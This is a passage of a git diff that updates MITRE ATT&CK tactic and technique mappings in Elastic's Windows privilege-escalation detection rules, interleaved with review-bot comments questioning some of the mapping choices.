"Native API" reference = "https://attack.mitre.org/techniques/T1106/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/privilege_escalation_printspooler_registry_copyfiles.toml b/rules/windows/privilege_escalation_printspooler_registry_copyfiles.toml index 020105af031..e1aae601bad 100644 --- a/rules/windows/privilege_escalation_printspooler_registry_copyfiles.toml +++ b/rules/windows/privilege_escalation_printspooler_registry_copyfiles.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/26" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -95,14 +95,31 @@ sequence by host.id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/privilege_escalation_printspooler_service_suspicious_file.toml b/rules/windows/privilege_escalation_printspooler_service_suspicious_file.toml index b425a85e9c6..5209db6b7d0 100644 --- a/rules/windows/privilege_escalation_printspooler_service_suspicious_file.toml +++ b/rules/windows/privilege_escalation_printspooler_service_suspicious_file.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/14" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -138,17 +138,26 @@ value = "?:\\\\Windows\\\\system32\\\\spool\\\\{????????-????-????-????-???????? [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.001" +name = "DLL" +reference = "https://attack.mitre.org/techniques/T1574/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id", "file.name"] diff --git a/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml b/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml index 75067c258a1..1f6466d2994 100644 --- a/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml +++ b/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/06" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -91,14 +91,31 @@ file where host.os.type == "windows" and event.type == "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" + +[[rule.threat.technique.subtechnique]] +id = "T1070.004" +name = "File Deletion" +reference = "https://attack.mitre.org/techniques/T1070/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml b/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml index c415ada0e36..7b6d04f8e88 100644 --- a/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml +++ b/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/05" integration = ["endpoint", "windows", "crowdstrike", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2025/10/07" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -135,46 +135,59 @@ registry where host.os.type == "windows" and event.type == "change" and process. [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [[rule.threat.technique.subtechnique]] id = "T1574.011" name = "Services Registry Permissions Weakness" reference = "https://attack.mitre.org/techniques/T1574/011/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1569" name = "System Services" reference = "https://attack.mitre.org/techniques/T1569/" + [[rule.threat.technique.subtechnique]] id = "T1569.002" name = "Service Execution" reference = "https://attack.mitre.org/techniques/T1569/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/privilege_escalation_rogue_windir_environment_var.toml b/rules/windows/privilege_escalation_rogue_windir_environment_var.toml index e411a855b25..265e4436435 100644 --- a/rules/windows/privilege_escalation_rogue_windir_environment_var.toml +++ b/rules/windows/privilege_escalation_rogue_windir_environment_var.toml 
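Review bot: The new third `[[rule.threat]]` entry maps T1112 Modify Registry to TA0003 Persistence, but in ATT&CK T1112 belongs to Defense Evasion only, and the other hunks in this series that add T1112 (the first hunk in this chunk and privilege_escalation_rogue_windir_environment_var.toml) file it under TA0005 Defense Evasion. The repository's tactic-to-technique correlation check should reject this mapping; if it passes, that check is not covering this case. Either move the T1112 entry to `id = "TA0005"` / `name = "Defense Evasion"` / `reference = "https://attack.mitre.org/tactics/TA0005/"`, or, if a Persistence mapping is the intent for a service ImagePath modification, carry it with T1543.003 Windows Service, which ATT&CK lists under Persistence as well as Privilege Escalation.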
@@ -2,7 +2,7 @@ creation_date = "2020/11/26" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -92,19 +92,31 @@ registry.path : ( [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [[rule.threat.technique.subtechnique]] id = "T1574.007" name = "Path Interception by PATH Environment Variable" reference = "https://attack.mitre.org/techniques/T1574/007/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml b/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml index 2f73a8e24e7..8fc20711803 100644 --- a/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml +++ b/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml @@ -2,7 +2,7 @@ creation_date = "2021/12/12" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,6 +84,7 @@ iam where host.os.type == "windows" and event.action == "renamed-user-account" a [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" 
@@ -93,27 +94,39 @@ reference = "https://attack.mitre.org/techniques/T1068/" id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.002" name = "Domain Accounts" reference = "https://attack.mitre.org/techniques/T1078/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/privilege_escalation_service_control_spawned_script_int.toml b/rules/windows/privilege_escalation_service_control_spawned_script_int.toml index c2d36fb1b78..cc533de6f4b 100644 --- a/rules/windows/privilege_escalation_service_control_spawned_script_int.toml +++ b/rules/windows/privilege_escalation_service_control_spawned_script_int.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "system", "windows", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
@@ -120,23 +120,25 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" @@ -146,6 +148,7 @@ reference = "https://attack.mitre.org/techniques/T1047/" id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -161,18 +164,34 @@ id = "T1059.005" name = "Visual Basic" reference = "https://attack.mitre.org/techniques/T1059/005/" +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + [[rule.threat.technique.subtechnique]] id = "T1218.010" name = "Regsvr32" 
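Review bot: In the third hunk, T1218.005 Mshta is added as a Defense Evasion sub-technique, but the rule's query is outside this hunk, so nothing here shows that mshta.exe is among the interpreters the rule actually matches; the existing Regsvr32 and Rundll32 sub-techniques suggest the list is meant to mirror the query's process set. Please confirm the query names mshta.exe, and drop the sub-technique if it does not. The Defense Evasion entry this hunk extends continues into the following hunk, so its `[rule.threat.tactic]` block is not visible here.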
@@ -183,10 +202,7 @@ id = "T1218.011" name = "Rundll32" reference = "https://attack.mitre.org/techniques/T1218/011/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml b/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml index db144eec549..fbb26f3b07c 100644 --- a/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml +++ b/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/11" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -87,6 +87,7 @@ iam where host.os.type == "windows" and event.action == "changed-computer-accoun [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" @@ -96,15 +97,18 @@ reference = "https://attack.mitre.org/techniques/T1068/" id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.002" name = "Domain Accounts" reference = "https://attack.mitre.org/techniques/T1078/002/" - +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml b/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml index 4f92ccdc7c3..5dd2e273789 100644 --- a/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml +++ b/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/10/28" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -88,53 +88,36 @@ process where host.os.type == "windows" and event.type == "start" and process.na [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1559" name = "Inter-Process Communication" reference = "https://attack.mitre.org/techniques/T1559/" + [[rule.threat.technique.subtechnique]] id = "T1559.001" name = "Component Object Model" reference = "https://attack.mitre.org/techniques/T1559/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml b/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml index 97b2898d655..280063046d8 100644 --- a/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml 
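Review bot: Deleting the whole Defense Evasion `[[rule.threat]]` entry removes a mapping that ATT&CK itself assigns to T1548.002 Bypass User Account Control (it is listed under both Privilege Escalation and Defense Evasion), so the rule now claims only one of the two tactics the technique carries. Nothing in these hunks states that a technique must be unique across a rule's entries, and the treatment is uneven within the series: com_interface_icmluautil, diskcleanup_hijack, dll_sideloading and event_viewer drop Defense Evasion the same way, whereas com_ieinstal keeps it by substituting T1218, mock_windir and winfw_mmc_hijack keep it with their remaining sub-technique, and unusual_svchost_childproc_childless trades the duplicated T1055.012 (itself Defense Evasion and Privilege Escalation in ATT&CK) for an Execution entry. If the intended rule is "one technique per rule, filed under its primary tactic", it deserves a one-line statement in the PR description and a consistent choice of which tactic keeps it; otherwise the Defense Evasion entries should stay.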
+++ b/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/03" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -91,53 +91,49 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1559" name = "Inter-Process Communication" reference = "https://attack.mitre.org/techniques/T1559/" + [[rule.threat.technique.subtechnique]] id = "T1559.001" name = "Component Object Model" reference = "https://attack.mitre.org/techniques/T1559/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - 
diff --git a/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml b/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml index cc5a3e44aa3..0a42a979410 100644 --- a/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml +++ b/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/19" integration = ["endpoint", "windows", "m365_defender"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -85,53 +85,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1559" name = "Inter-Process Communication" reference = "https://attack.mitre.org/techniques/T1559/" + [[rule.threat.technique.subtechnique]] id = "T1559.001" name = "Component Object Model" reference = "https://attack.mitre.org/techniques/T1559/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml b/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml index 8763bfd5251..47b9cbe8d77 100644 --- a/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml +++ b/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -101,53 +101,41 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - 
diff --git a/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml b/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml index db0e8042ad4..0589211912e 100644 --- a/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml +++ b/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/27" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/09/01" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -92,46 +92,28 @@ file where host.os.type == "windows" and event.type : "change" and process.name [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" - - [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" 
diff --git a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml b/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml index c9cd1c4a1bb..3834bf21c19 100644 --- a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml +++ b/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/17" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -144,36 +144,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml b/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml index 8752086e4ee..e8e462a1c8b 100644 --- a/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml +++ b/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/10/26" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/05/05" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -134,46 +134,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" - -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml b/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml index fa2fd7c192b..9afd4609252 100644 --- a/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml +++ b/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/10/14" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -132,46 +132,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.014" name = "MMC" reference = "https://attack.mitre.org/techniques/T1218/014/" - -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml b/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml index 4a8e99f0049..dedb007cc3a 100644 --- a/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml +++ b/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml 
